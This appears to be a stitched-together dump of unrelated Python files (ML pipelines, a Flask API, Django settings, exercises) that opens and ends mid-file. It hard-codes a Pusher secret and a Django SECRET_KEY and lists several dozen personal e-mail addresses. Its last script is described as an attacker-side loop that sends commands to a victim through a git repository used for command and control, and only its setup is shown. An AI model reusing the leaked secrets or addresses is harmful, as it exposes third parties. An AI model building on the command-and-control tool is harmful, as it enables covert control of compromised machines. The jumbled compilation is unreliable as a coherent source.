#           .format(score = scores.mean(), err = scores.std()))
# One output row per patient: every 12th input row carries the pid.
df = pd.DataFrame({'pid': test_data.iloc[0::12, 0].values})
for i, label in enumerate(task1_labels):
    # Refit the same pipeline per label and store class-1 probabilities.
    pipeline.fit(x_train, y_train[:, i].ravel())
    # print("Training score:", metrics.roc_auc_score(y_train[:, i], pipeline.predict_proba(x_train)[:, 1]))
    predictions = pipeline.predict_proba(x_test)[:, 1]
    df[label] = predictions
# Task 2: single binary label (sepsis prediction).
task2_labels = ['LABEL_Sepsis']
y_train = labels[task2_labels].to_numpy().ravel()
pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler(), HistGradientBoostingClassifier(l2_regularization=1.0))
# scores = cross_val_score(pipeline, x_train, y_train, cv=5, scoring='roc_auc', verbose=True)
# print("Cross-validation score is {score:.3f},"
#       " standard deviation is {err:.3f}"
#       .format(score = scores.mean(), err = scores.std()))
pipeline.fit(x_train, y_train)
predictions = pipeline.predict_proba(x_test)[:, 1]
# print("Training score:", metrics.roc_auc_score(y_train, pipeline.predict_proba(x_train)[:, 1]))
df[task2_labels[0]] = predictions
# Task 3: regression of future vital-sign means.
task3_labels = ['LABEL_RRate', 'LABEL_ABPm', 'LABEL_SpO2', 'LABEL_Heartrate']
y_train = labels[task3_labels].to_numpy()
pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler(), HistGradientBoostingRegressor(max_depth=3))
# for i, label in enumerate(task3_labels):
#     scores = cross_val_score(pipeline, x_train, y_train[:, i],
#                              cv=5,
#                              scoring='r2',
#                              verbose=True)
#     print("Cross-validation score is {score:.3f},"
#           " standard deviation is {err:.3f}"
#           .format(score = scores.mean(), err = scores.std()))
for i, label in enumerate(task3_labels):
    pipeline.fit(x_train, y_train[:, i])
    predictions = pipeline.predict(x_test)
    # print("Training score:", metrics.r2_score(y_train[:, i], pipeline.predict(x_train)))
    df[label] = predictions
# Bundle the predictions CSV inside a zip archive.
compression_options = dict(method='zip', archive_name='prediction.csv')
df.to_csv('prediction.zip', index=False, float_format='%.3f', compression=compression_options)
|
# file that holds all the routes of the API
from flask import Blueprint, jsonify, request
from bson import json_util
import json
import aws
import index
# Blueprint grouping all FitShare API routes; registered by the main app.
fitShare_api = Blueprint('fitshare_api', __name__)
######################################################################################
# #
# All FitShare GET Routes to RETRIEVE from cloud DB and cloud Services #
# #
######################################################################################
@fitShare_api.route("/api/allPrograms")
def getAllPrograms():
    """Return every document in the Programs collection as JSON."""
    collection = index.mongo.db.Programs
    # Round-trip through json_util so BSON types (ObjectId, dates) become JSON-safe.
    response = [json.loads(json_util.dumps(document)) for document in collection.find({})]
    return jsonify(response)
@fitShare_api.route("/api/sponsoredPrograms")
def getSponsoredPrograms():
    """Return every document in the SponsoredPrograms collection as JSON."""
    collection = index.mongo.db.SponsoredPrograms
    docs = []
    for document in collection.find({}):
        # json_util handles BSON types that plain json cannot serialize.
        docs.append(json.loads(json_util.dumps(document)))
    return jsonify(docs)
@fitShare_api.route("/api/discoverTrainers")
def discoverTrainers():
    """Return all user documents (trainers) as JSON."""
    users = index.mongo.db.Users
    serialized = [json.loads(json_util.dumps(doc)) for doc in users.find({})]
    return jsonify(serialized)
######################################################################################
# #
# All FitShare POST Routes to Update cloud DB and cloud Services #
# #
######################################################################################
# route that uploads files to AWS S3/Updates DB
@fitShare_api.route("/api/upload", methods=['POST'])
def uploader():
    """Upload a program file to S3 and record it for the user.

    Expects multipart form data with 'file', 'userID', 'Price',
    'programName', 'Description' and 'Name'. Returns the updated user
    document as JSON, or a 400 error when no file was attached.
    """
    # Fix: the original only printed "no file part" and then fell through to
    # the DB lookup with undefined variables (NameError); return early instead.
    if 'file' not in request.files:
        return jsonify({"error": "no file part"}), 400
    # start parsing the request for data we need
    file = request.files['file']
    userID = request.form['userID']
    price = request.form['Price']
    intPrice = int(price)  # the DB stores the price as an integer
    # call our AWS module to handle upload to S3 bucket - returns file url and name
    response = aws.uploadFile(file.filename, file)
    # create a reference to our mongo DB collections
    Users = index.mongo.db.Users
    allPrograms = index.mongo.db.Programs
    # go into users, update the courses they offer, push the new course they teaching/offering
    Users.update_one({'_id': userID}, {
        '$push': {'courses': {"name": request.form['programName'], "file": response['file']}}}, upsert=True)
    # a mongo db document model to insert the data we get from the request on client side
    insertionModel = {
        "name": request.form['programName'],
        "price": intPrice,
        "description": request.form['Description'],
        "trainer": request.form['Name'],
        "file": response['file']
    }
    allPrograms.insert_one(insertionModel)
    # retrieve and return the user that has all updated info.
    doc = Users.find_one({"_id": userID})
    user = json.loads(json_util.dumps(doc))
    return jsonify(user)
# route that contacts AWS cognito services to register user
@fitShare_api.route("/api/registerUser", methods=['POST'])
def registerUser():
    """Register a user in Cognito and mirror them into the Users collection."""
    payload = request.get_json()
    # Cognito returns the new user's UID; it is reused as the Mongo _id so
    # both systems share a single identifier.
    uid = aws.createUser(payload['email'], payload['password'])
    users = index.mongo.db.Users
    users.insert_one(
        {"_id": uid, "email": payload["email"], "name": payload['name']})
    return 'done'
# route that authenticates a user in AWS Cognito
@fitShare_api.route("/api/authenticateUser", methods=['POST'])
def authenticateUser():
    """Authenticate against Cognito and return the matching user document."""
    creds = request.get_json()
    # The AWS module authenticates on the backend and returns the user's UID.
    uid = aws.authenticateUser(creds['email'], creds['password'])
    user_doc = index.mongo.db.Users.find_one({"_id": uid})
    return jsonify(json.loads(json_util.dumps(user_doc)))
#Route that updates database for users purchased programs
@fitShare_api.route("/api/purchasedProgram", methods=['POST'])
def purchasedProgram():
    """Append a purchased program to the user's record; return the user."""
    payload = request.get_json()
    uid = payload['userID']
    program = payload['programName']
    # UPSERT so a document is created if the user has no record yet
    users_collection = index.mongo.db.Users
    users_collection.update_one(
        {'_id': uid},
        {'$push': {'purchasedPrograms': program}},
        upsert=True)
    # RETURN the updated user back to the client
    refreshed = users_collection.find_one({"_id": uid})
    return jsonify(json.loads(json_util.dumps(refreshed)))
|
import pusher
class Pusher:
    """Lazily-created singleton wrapper around the pusher client."""
    # Shared client instance; populated on first get_instance() call.
    pusher_client = None
    @classmethod
    def create_instance(cls):
        """(Re)create the shared pusher client with the app credentials."""
        # NOTE(review): credentials are hard-coded here; consider moving
        # them into environment variables / config.
        cls.pusher_client = pusher.Pusher(
            app_id='732495',
            key='4df52d9bd8bcf616c85c',
            secret='54e285d0324b0e65fcc8',
            cluster='eu',
            ssl=True,
        )
        print("instance is created")
    @classmethod
    def get_instance(cls):
        """Return the shared client, creating it on first access."""
        if cls.pusher_client is not None:
            return cls.pusher_client
        cls.create_instance()
        return cls.pusher_client
|
from keras.models import Model
from keras.layers import Input
from keras.layers import Dense
from keras.layers import Conv1D, MaxPooling1D
from keras.layers import GRU, Bidirectional
from keras.optimizers import Adam
import numpy as np

# Build the network: Conv1D front end, bidirectional GRU, dense head.
input_layer = Input(shape=(300, 26), name='input')
conv_1d = Conv1D(filters=64, kernel_size=5, strides=5, padding='valid')(input_layer)
bi_gru = Bidirectional(GRU(units=64, activation='elu', return_sequences=False))(conv_1d)
dense_1 = Dense(units=32, activation='elu')(bi_gru)
# BUG FIX: labels are a single 0/1 column of shape (100,), so a
# binary_crossentropy head needs ONE sigmoid unit, not two — units=2
# makes the target and output shapes incompatible (the commented
# reference implementation in this file also uses units=1).
dense_2 = Dense(units=1, activation='sigmoid')(dense_1)
model = Model(input_layer, dense_2)
print(model.summary())

# Synthetic data for a reproducible smoke-test training run.
np.random.seed(0)
data = np.random.rand(100, 300, 26)
label = np.random.randint(0, 2, (100,))
optimizer = Adam(lr=0.001)
model.compile(loss='binary_crossentropy', optimizer=optimizer)
model.fit(data, label, epochs=50)
model.save('training_model.h5')
#letrongan
#update
# -------------------------------------------------------------------------------------------------
# from keras.models import Model
# from keras.layers import Input
# from keras.layers import Conv1D, MaxPooling2D
# from keras.layers import GRU, Bidirectional
# from keras.layers import Dense
# from keras.optimizers import Adam
#
# # Build the model
# # input layers (as placeholder)
# input_layer = Input(shape=(300,26), name='input')
# # convolutional layers
# conv_2d = Conv1D(filters=64, kernel_size=5, strides=5, padding='valid')(input_layer)
# # recurrent_layers
# bi_gru = Bidirectional(GRU(units=64, activation='elu', return_sequences=False))(conv_2d)
# dense_1 = Dense(units=32, activation='elu')(bi_gru)
# dense_2 = Dense(units = 1, activation='sigmoid')(dense_1)
# model = Model(input_layer, dense_2)
# print (model.summary())
#
# import numpy as np
# # for consistency
# np.random.seed(0)
# data = np.random.rand(100, 300, 26)
# label = np.random.randint(0,2,(100,))
#
# from keras.optimizers import Adam
# optimizer = Adam(lr=0.001)
# model.compile(loss = 'binary_crossentropy', optimizer=optimizer)
#
# model.fit(data, label, epochs=10)
# model.save('trained_model.h5')
#
# from keras.models import load_model
# # Pass your .h5 file here
# model = load_model('trained_model.h5')
# test_data = np.random.rand(1,300,26)
# result = model.predict(test_data)
# print (result)
|
import report_transfer
import regional_report_transfer
import firm_report_transfer
import pmu_report_transfer
import bank_report |
#!/usr/bin/python3
"""
script to add arguments to a JSON list stored in add_item.json
"""
try:
    import json
    import sys
    save_to_json_file = __import__('7-save_to_json_file').save_to_json_file
    load_from_json_file = __import__(
        '8-load_from_json_file').load_from_json_file
except ImportError:
    print("Import Error")
# Load the existing list, or start fresh if the file doesn't exist yet.
try:
    a_list = load_from_json_file('add_item.json')
except FileNotFoundError:
    a_list = []
# BUG FIX: sys.argv[1:] skips the script name positionally. The old
# `if arg == sys.argv[0]: continue` comparison also dropped any real
# argument that happened to equal the script name.
a_list.extend(sys.argv[1:])
save_to_json_file(a_list, 'add_item.json')
|
from .base import *
# Development settings: extend the base settings with debug/test helpers.
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# django_nose supplies the test runner used during development.
INSTALLED_APPS += (
    'django_nose',
)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7!@uqrj1=0riqnmyl+79jbsu5t$uz7=7rjc1+sx=1(%)o4ox6c'
# Print outgoing mail to the console instead of actually sending it.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Optional machine-local overrides; their absence is not an error.
try:
    from .local import *
except ImportError:
    pass
|
import tensorflow as tf
from text_rcnn_model import TRCNNConfig, TextRCNN
import numpy as np
import tensorflow.contrib.keras as kr
import time
from datetime import timedelta
import os
from data_process import Data
def get_time_dif(start_time):
    """Return the wall-clock time elapsed since start_time as a
    timedelta rounded to whole seconds."""
    elapsed = time.time() - start_time
    return timedelta(seconds=int(round(elapsed)))
def batch_iter(x, y, batch_size=128):
    """Yield shuffled (padded_x, y) mini-batches covering the dataset."""
    total = len(x)
    num_batches = (total - 1) // batch_size + 1
    # Fresh permutation per call so batches differ between epochs.
    order = np.random.permutation(np.arange(total))
    x_shuffled = x[order]
    y_shuffled = y[order]
    for batch_idx in range(num_batches):
        lo = batch_idx * batch_size
        hi = min(lo + batch_size, total)
        max_len = config.seq_length
        # padding="post", truncating="post": sequences longer than max_len
        # are cut at the tail; shorter ones are padded at the tail.
        # (With maxlen=None, pad_sequences would instead pad/truncate to
        # the longest sequence in the batch.)
        padded = kr.preprocessing.sequence.pad_sequences(
            x_shuffled[lo:hi], maxlen=max_len,
            padding="post", truncating="post")
        yield padded, y_shuffled[lo:hi]
def feed_data(x_batch, y_batch, keep_prob):
    """Build the TF feed_dict for one batch, including the true
    (pre-padding) sequence lengths."""
    lengths = data.get_sequence_length(x_batch)
    return {
        model.input_x: x_batch,
        model.input_y: y_batch,
        model.sequence_lengths: lengths,
        model.keep_prob: keep_prob,
    }
def evaluate(sess, x_, y_):
    """Return (mean loss, mean accuracy) of the model over x_/y_."""
    total = len(x_)
    loss_sum = 0.0
    acc_sum = 0.0
    for batch_x, batch_y in batch_iter(x_, y_):
        n = len(batch_x)
        # keep_prob=1.0: dropout disabled during evaluation
        fd = feed_data(batch_x, batch_y, 1.0)
        loss, acc = sess.run([model.loss, model.acc], feed_dict=fd)
        # Weight each batch by its size so the last (short) batch
        # doesn't skew the averages.
        loss_sum += loss * n
        acc_sum += acc * n
    return loss_sum / total, acc_sum / total
def train(x_train_src, y_train_src, x_valid_src, y_valid_src, model_src):
    """Train the module-level TextRCNN `model`, checkpointing the best
    validation accuracy into model_src and logging TensorBoard summaries.

    The *_src arguments are .npy paths for train/validation features and
    labels; model_src is the output directory for checkpoints and logs.
    Training stops early after `require_improvement` batches without a
    validation-accuracy improvement.
    """
    if not os.path.exists(model_src):
        os.mkdir(model_src)
    tensorboard_dir = 'tensorboard'
    if not os.path.exists(os.path.join(model_src, tensorboard_dir)):
        os.mkdir(os.path.join(model_src, tensorboard_dir))
    tf.summary.scalar("loss", model.loss)
    tf.summary.scalar("accuracy", model.acc)
    merged_summary = tf.summary.merge_all()
    writer = tf.summary.FileWriter(os.path.join(model_src, tensorboard_dir))
    # Configure the checkpoint saver
    saver = tf.train.Saver()
    print("Loading training and validation data...")
    # Load the training and validation sets
    start_time = time.time()
    x_train = np.load(x_train_src, allow_pickle=True)
    y_train = np.load(y_train_src)
    x_valid = np.load(x_valid_src, allow_pickle=True)
    y_valid = np.load(y_valid_src)
    time_dif = get_time_dif(start_time)
    print("Time usage:", time_dif)
    # Create the TF session
    session = tf.Session()
    session.run(tf.global_variables_initializer())
    writer.add_graph(session.graph)
    print('Training and evaluating...')
    start_time = time.time()
    total_batch = 0  # total number of batches processed
    best_acc_val = 0.0  # best validation accuracy so far
    last_improved = 0  # batch index of the last improvement
    require_improvement = 1000  # early-stop after this many batches without improvement
    flag = False
    for epoch in range(100):
        print("Epoch: {}".format(epoch))
        batch_train = batch_iter(x_train, y_train)
        for x_batch, y_batch in batch_train:
            feed_dict = feed_data(x_batch, y_batch, 0.5)
            if total_batch % config.save_per_batch == 0:
                # Periodically write training summaries for TensorBoard
                s = session.run(merged_summary, feed_dict=feed_dict)
                writer.add_summary(s, total_batch)
            if total_batch % config.print_per_batch == 0:
                # Periodically report performance on train and validation sets
                # feed_dict = feed_data(x_valid, x_valid, len_valid, 1.0)
                loss_train, acc_train = session.run([model.loss, model.acc], feed_dict=feed_dict)
                loss_valid, acc_valid = evaluate(session, x_valid, y_valid)
                if acc_valid > best_acc_val:
                    # Checkpoint the best validation result
                    best_acc_val = acc_valid
                    last_improved = total_batch
                    saver.save(sess=session, save_path=os.path.join(model_src, "best_validation"))
                    # NOTE(review): time_dif only refreshes on improvement,
                    # so the printed time can be stale — confirm intended.
                    time_dif = get_time_dif(start_time)
                    improved_str = '*'
                else:
                    improved_str = ''
                msg = 'Iter: {}, Train Loss: {}, Train Acc: {},' \
                      + ' Val Loss: {}, Val Acc: {}, Time: {} {}'
                print(msg.format(total_batch, loss_train, acc_train, loss_valid, acc_valid, time_dif, improved_str))
            session.run(model.opt, feed_dict=feed_dict)  # run one optimization step
            total_batch += 1
            if total_batch - last_improved > require_improvement:
                # Validation accuracy stagnated for too long: early stop
                print("No optimization for a long time, auto-stopping...")
                flag = True
                break  # leave the batch loop
        if flag:
            break
    print("the best acc on validation is {}".format(best_acc_val))
if __name__ == "__main__":
data = Data()
vocab_src = "data/middle_result/vocab.npy"
vocab, _ = data.load_vocab(vocab_src)
config = TRCNNConfig()
config.vocab_size = len(vocab)
model_src = "data/model/rcnn"
train_src = "data/vectorized_data/train"
validation_src = "data/vectorized_data/validation"
x_train_src = os.path.join(train_src, "x.npy")
y_train_src = os.path.join(train_src, "y.npy")
x_valid_src = os.path.join(validation_src, "x.npy")
y_valid_src = os.path.join(validation_src, "y.npy")
model = TextRCNN(config)
train(x_train_src, y_train_src, x_valid_src, y_valid_src, model_src)
|
# Assignment 2.2
# Prompt the user for their name with input(), then welcome them.
name = input("Enter your name ")
print("Hello " + name)

# Assignment 2.3
# Prompt for hours and rate and print the gross pay.
# Test data: 35 hours at 2.75/hour -> pay 96.25. input() returns a
# string, so both values are converted with float(); no error checking.
hrs = input("Enter Hours: ")
rate = input("Enter Rate: ")
pay = float(hrs) * float(rate)
print("Pay:", pay)
|
from test_support import *
def test_exception():
    # The message given to the constructor must prefix what()'s output.
    exc = rf.FpException("test")
    assert exc.what().startswith("test")
|
'''
random string generator: print a base64-alphabet random string of the
length given on the command line
'''
import os
import binascii
import argparse

parser = argparse.ArgumentParser(description='generate random string')
parser.add_argument('size', metavar='size', type=int, help='length of the random string')
args = parser.parse_args()
# b2a_base64 emits ~4/3 * size characters, so slicing to `size` always
# yields a full-length result (and drops the trailing newline).
rand_bytes = binascii.b2a_base64(os.urandom(args.size))
# Renamed from `string` to avoid shadowing the stdlib `string` module.
rand_str = str(rand_bytes[:args.size], encoding='utf-8')
print(rand_str)
|
def Col(i):
    """One Collatz step: 3*i + 1 for odd i, i // 2 for even i."""
    return i * 3 + 1 if i % 2 else i // 2
# Read a starting value and print its Collatz trajectory, stopping
# once the sequence reaches 1 (or immediately if a step yields 0).
n = int(input())
print(n, end=" ")
while True:
    n = Col(n)
    if n == 0:
        break
    print(n, end=" ")
    if n == 1:
        break
|
# Raw sign-up list as collected (contains duplicates and a few entries
# with stray whitespace); de-duplicated and sorted further below.
students_email = [
    'nenavathpraveen10@gmail.com',
    'sapna98saini@gmail.com',
    '90.preeti@gmail.com',
    'aryali012@gmail.com',
    'venkateshmamidala39@gmail.com',
    'somasekhardesigns@gmail.com',
    'zeddkhan101@gmail.com',
    'kumarkartavay@gmail.com',
    'biswajit27m@gmail.com',
    'sp4185202@gmail.com',
    'neerajpal8548@gmail.com',
    'sbankar217@gmail.com',
    'cp150496@gmail.com',
    'santprakash28877@gmail.com',
    'vgowdavenu112@gmail.com',
    'scorpioveer@gmail.com',
    'veershinde195@gmail.com',
    'safikulsk732@gmail.com',
    '90.preeti@gmail.com',
    'sapna98saini@gmail.com',
    'bhavanreddy326@gmail.com',
    'khanabdulgani_87@yahoo.com',
    'kumarkartavay@gmail.com',
    'bariavs41@gmail.com',
    'somasekhardesigns@gmail.com',
    'saurabhdongre16@gmail.com',
    'saurabhdongre16@gmail.com',
    'zeddkhan101@gmail.com',
    'zeddkhan101@gmail.com',
    'kumarkartavay@gmail.com',
    'kumarkartavay@gmail.com',
    'parthivbhatti007@gmail.com',
    'bhattiujjval007@gmail.com',
    'kumarkartavay@gmail.com',
    'kumarkartavay@gmail.com',
    'santprakash28877@gmail.com',
    'rajnishkumar8595@gmail.com',
    's.kumar.s8101997@gmail.com ',
    'kanhu.kcn@gmail.com',
    'zeddkhan101@gmail.com',
    'govindsarraf4109@gmail.com',
    'himanshugoyal785@gmail.com',
    'bhattiujjval007@gmail.com',
    'shailendermy.10@gmail.com' ,
    'saurabhdongre16@gmail.com',
    'nitypatel6@gmail.com',
    'subirsgghosh@gmail.com',
    'jk426704@gmail.com',
    'gokulharsha06@gmail.com',
    'parthivbhatti007@gmail.com',
    'nm.mahesh66@gmail.com',
    'bariavs41@gmail.com',
    'amarsharma00786@gmail.com',
    'sharmadheeraj849@gmail.com ',
    'santprakash28877@gmail.com',
    'ruthvikchintam@gmail.com',
    'bhavanreddy326@gmail.com',
    'bariavs41@gmail.com',
    'sirlakhwinder@gmail.com'
]
# Scratch list (currently unused).
temp = [
]
# Total sign-ups before de-duplication (kept for reporting).
no_of_students = len(students_email)
# Remove duplicates, then sort for a stable, readable listing
# (sorted(set(...)) replaces list(set(...)) followed by .sort()).
students_email = sorted(set(students_email))
# Print each e-mail with a 1-based, right-aligned serial number;
# enumerate() replaces the old range(len(...)) indexing.
for serial, email in enumerate(students_email, start=1):
    print(str(serial).rjust(2, ' '), email)
# [DOCS]
# https://docs.python.jp/3/library/codecs.html
# Script for solving ROT (Caesar-shift) ciphers.
import codecs
import sys


def rot(text, shift):
    """Return `text` Caesar-shifted forward by `shift` places.

    Upper-case letters behave exactly as before (shifted within A-Z).
    BUG FIX: lower-case letters are now shifted within a-z — the old
    A-Z-only formula mapped them onto garbage characters.
    """
    out = []
    for letter in text:
        base = ord('a') if letter.islower() else ord('A')
        out.append(chr(base + (ord(letter) - base + shift) % 26))
    return ''.join(out)


if __name__ == '__main__':
    # Guarding the CLI section lets the module be imported for testing
    # without side effects; direct invocation behaves as before.
    argv = sys.argv
    if (len(argv) != 3):
        print('Argument is less. Please add char and rot num.')
        exit()
    print(rot(argv[1], int(argv[2])))
|
#!/usr/bin/env python3
from collections import Counter
import sys
def parse_line(l):
    """Parse a reaction line "N1 A, N2 B => N3 C" into
    (["N3", "C"], {"A": N1, "B": N2})."""
    lhs, rhs = l.split(" => ")
    reagents = {}
    for component in lhs.split(", "):
        qty, chemical = component.split(" ")
        reagents[chemical] = int(qty)
    # Product quantity stays a string here; callers int() it as needed.
    product = rhs.strip().split(" ")
    return (product, reagents)
# Build the reaction table keyed by product chemical:
# {product: {"in": {reagent: qty, ...}, "out": produced_qty}}
with open(sys.argv[1]) as f:
    chemicals = {out[1]: { "in": ins, "out": int(out[0]) }
                 for out, ins in [parse_line(l) for l in f.readlines()]}
def required_ore(fuel_qty):
    """Return the ORE needed to produce fuel_qty units of FUEL, reusing
    surplus intermediate chemicals produced by over-running reactions."""
    spare = Counter()     # leftover chemicals from previous reactions
    required = Counter()  # chemicals still to be produced this pass
    required["FUEL"] = fuel_qty
    while True:
        #print("Requirements {}".format(dict(required)))
        # Done once ORE is the only outstanding requirement.
        if len(required) == 1 and "ORE" in required:
            break
        next_required = Counter()
        for component, qty in required.items():
            #print("Need {} x {}".format(component, qty))
            if component == "ORE":
                # ORE is raw input: carry it forward unchanged.
                next_required["ORE"] += qty
                continue
            # First check if we can use some spare chemicals
            if spare[component] > 0:
                use_spare = min(spare[component], qty)
                qty -= use_spare
                spare[component] -= use_spare
                #print("Took {} from storage".format(use_spare))
            assert qty >= 0
            if qty == 0:
                continue
            # Find the reaction that generates component, and add the
            # necessary reagents to the requirements
            gen_qty = chemicals[component]["out"]
            gen_requirements = chemicals[component]["in"]
            # Ceiling division: run the reaction enough times to cover qty.
            reaction_count = ((qty - 1) // gen_qty) + 1
            #print("Gen {} from {} x {}".format(reaction_count * gen_qty, reaction_count, chemicals[component]))
            # Any over-production goes into storage for later reuse.
            spare_qty = (reaction_count * gen_qty) - qty
            if spare_qty:
                #print("Add {} x {} to storage".format(component, spare_qty))
                spare[component] += spare_qty
            for reagent, reagent_qty in gen_requirements.items():
                next_required[reagent] += reaction_count * reagent_qty
                #print(reagent, next_required[reagent])
        required = next_required
    return required["ORE"]
# Part 2: how much FUEL can one trillion ORE produce?
TARGET = 1000000000000
baseline = required_ore(1)
print("1 FUEL <= {} ORE".format(baseline))
# First guess ignores surplus reuse, so it underestimates the yield.
estimate_fuel = TARGET // baseline
actual_ore = required_ore(estimate_fuel)
# Bracket the answer for the binary search below.
if actual_ore > TARGET:
    fuel_range = [0, estimate_fuel]
else:
    fuel_range = [estimate_fuel, estimate_fuel * 2]
# Binary search for the largest fuel amount costing <= TARGET ore.
while True:
    if fuel_range[1] - fuel_range[0] <= 1:
        break
    try_fuel = (fuel_range[0] + fuel_range[1]) // 2
    actual_ore = required_ore(try_fuel)
    if actual_ore > TARGET:
        fuel_range = [fuel_range[0], try_fuel]
    else:
        fuel_range = [try_fuel, fuel_range[1]]
print("{} FUEL <= {} ORE".format(fuel_range[0], required_ore(fuel_range[0])))
|
# @desc: script that formats json array data to elastic bulk data
# @author: mladen milosevic
# @date: 25.02.2020.
import json
import time

inputFile = 'ebooks.json'
outputFile = 'ebooks-bulk.json'

start = time.process_time()
with open(inputFile, 'r', encoding="utf8") as moviesFile:
    movies = json.load(moviesFile)
    with open(outputFile, 'w+') as bulkFile:
        # enumerate(..., start=1) replaces indexing by range(len(...));
        # _id stays 1-based exactly as before.
        for doc_id, movie in enumerate(movies, start=1):
            # Elastic bulk format: an action line, then the document line.
            bulkFile.write(f'{{"index": {{ "_id":"{doc_id}" }} }}\n')
            bulkFile.write(f'{json.dumps(movie)}\n')
print(time.process_time() - start)
from django.urls import path
from . import views
# URL routes for the squirrel-tracking views.
urlpatterns = [
    path('',views.home),
    path('views/',views.index),
    path('map/',views.coordinates),
    path('add/', views.add_squirrel),
    # Per-squirrel edit page, keyed by its unique ID.
    path('views/<str:Unique_Squirrel_ID>/edit/',views.edit_squirrel),
    path('stats/',views.stats),
]
|
# Developed since: Feb 2010
import upy.core
import numpy
# Reference:
# Siegfried Gottwald, Herbert K"astner, Helmut Rudolph (Hg.):
# Meyers kleine Enzyklop"adie Mathematik
# 14., neu bearbeitete und erweiterte Aufl. -
# Mannheim, Leipzig, Wien, Z"urich: Meyers Lexikonverlag, 1995
# Abschn. 28.2. Ausgleichsrechnung, S. 659 ff.
# - Lineare Regression S. 667
__all__ = ['linear_regression']
def linear_regression(x, y, weights = None, dtype = None):
    """Weighted linear regression of values Y at positions X.

    X is assumed to be an iterable of numbers and will be converted into
    an ndarray of type DTYPE.  Y can be an iterable of upy.undarrays or
    of ordinary arrays; it is converted into a list of upy.undarrays
    first.  When WEIGHTS is not given, the weights are taken from the Y
    elements via ua.weight(); WEIGHTS, if given, overrides them.
    Returns (alpha, beta) as upy.undarrays for the model
    y = alpha + beta * x.
    """
    # Convert x's elements to a single numpy.ndarray, if necessary ...
    sequence_x = numpy.asarray(x, dtype = dtype)
    # Convert y's elements to upy.undarrays, if necessary.
    # BUG FIX: a list comprehension instead of map() — on Python 3,
    # map() returns an iterator, which would break the len() call below.
    sequence_y = [upy.core.undarray(element, dtype = dtype)
                  for element in y]
    # Extract the number of elements ...
    N = len(sequence_y)
    # Do a simple-minded check. If the shape of the sub-arrays doesn't match,
    # some future call will probably fail to execute.
    assert(len(sequence_x) == len(sequence_y))
    # Extract the nominal values ...
    x_s = sequence_x  # Already ready to be used.
    a_s = numpy.asarray([element.value for element in sequence_y])
    # Extract the weights ...
    if weights is None:
        # Derive the weights from the y undarrays.
        p_s = [ua.weight() for ua in sequence_y]
    else:
        # Use the given weights.
        p_s = weights
    # Convert p_s into a numpy.ndarray for speed ...
    p_s = numpy.asarray(p_s)
    # Perform the weighted least-squares calculation (Meyers kleine
    # Enzyklopaedie Mathematik, sect. 28.2, "Lineare Regression") ...
    pa = (p_s * a_s).sum(axis = 0)
    px2 = (p_s * x_s ** 2).sum(axis = 0)
    pax = (p_s * a_s * x_s).sum(axis = 0)
    px = (p_s * x_s).sum(axis = 0)
    p = p_s.sum(axis = 0)
    alpha = (pa * px2 - pax * px) / (p * px2 - px ** 2)
    beta = (pax * p - pa * px) / (p * px2 - px ** 2)
    # Residual-based uncertainty of the fitted parameters.
    peps2 = (p_s * (a_s - alpha - beta * x_s) ** 2).sum(axis = 0)
    m = numpy.sqrt(peps2 / float(N - 2))
    m_alpha = m * numpy.sqrt(px2 / (p * px2 - px ** 2))
    m_beta = m * numpy.sqrt(p / (p * px2 - px ** 2))
    # NOTE(review): uses upy.undarray here but upy.core.undarray above —
    # confirm both names are exported by the upy package.
    return (upy.undarray(alpha, m_alpha, sigmas = 1),
            upy.undarray(beta, m_beta, sigmas = 1))
|
#Libraries
import RPi.GPIO as GPIO
import time
#GPIO Mode: physical BOARD pin numbering
GPIO.setmode(GPIO.BOARD)
#set GPIO Pins driving the motor (B channel)
Bin1 = 11
Bin2 = 13
Bpwm = 15
# Duty-cycle presets, in percent
slow = 20
med = 50
fast = 100
GPIO.setup(Bin1,GPIO.OUT)
GPIO.setup(Bin2,GPIO.OUT)
GPIO.setup(Bpwm,GPIO.OUT)
# NOTE(review): GPIO.PWM's second argument is the frequency in Hz, so
# passing `slow` (20) sets 20 Hz, which ChangeFrequency(100) then
# immediately overrides to 100 Hz — confirm the initial value is intended.
rightTopPWM = GPIO.PWM(Bin1,slow)
rightTopPWM.ChangeFrequency(100)
rightTopPWM.start(0)
rightBottomPWM = GPIO.PWM(Bin2,slow)
rightBottomPWM.ChangeFrequency(100)
rightBottomPWM.start(0)
#PWM Parameters
def forward(speed=med):
    # Drive forward: duty cycle on the top input, bottom input held low.
    rightTopPWM.ChangeDutyCycle(speed)
    rightBottomPWM.ChangeDutyCycle(0)
def reverse(speed=med):
    # Reverse: bottom input carries the duty cycle instead.
    rightTopPWM.ChangeDutyCycle(0)
    rightBottomPWM.ChangeDutyCycle(speed)
def stop():
    # Both inputs low -> motor stops.
    rightTopPWM.ChangeDutyCycle(0)
    rightBottomPWM.ChangeDutyCycle(0)
if __name__ == '__main__':
    try:
        # Demo cycle: slow forward, medium reverse, fast forward, stop.
        while True:
            forward(slow)
            time.sleep(2)
            reverse(med)
            time.sleep(2)
            forward(fast)
            time.sleep(2)
            stop()
            time.sleep(2)
    except KeyboardInterrupt:
        # On Ctrl-C: halt the motor and release the GPIO pins cleanly.
        stop()
        print("program stopped")
        GPIO.cleanup()
|
#!/usr/bin/python
import git # Interacting with git
from git import Repo # Interacting with git Repositories
import shutil # for conveniently deleting local folder
import hashlib # for getting hash of file
import pexpect # for interacting with shell
from subprocess import Popen, PIPE, STDOUT
import commands
import argparse
import sys
import os
import time
def main():
    """Attacker-side control loop (Python 2).

    Clones the C2 repository, then forever: pulls, displays the victim's
    latest out.txt, prompts for a command, writes it to in.txt, commits
    and pushes, then polls until the victim responds.
    """
    if(os.path.exists(args.path)):
        answer = raw_input("path already exists Should I delete that folder and all its contents? [y/n]? ")
        if(answer == "y"):
            shutil.rmtree(args.path, ignore_errors=True) # rm -r <path>
    # Git Clone - copy down the target repo
    print "Cloning " + args.url + " down to " + args.path
    Repo.clone_from(args.url, args.path)
    localrepo = git.Repo(args.path) # object ref to local path
    infile = os.path.join(args.path, 'in.txt') # full path to in.txt
    outfile = os.path.join(args.path, 'out.txt') # full path to out.txt
    print "infile: " + infile
    print "outfile: " + outfile
    # Being in the git folder is pretty useful throughout.
    os.chdir(args.path)
    # calculate the checksum of the outfile currently
    outhash = hashlib.md5(open(outfile, 'rb').read()).hexdigest()
    print "outhash: " + outhash
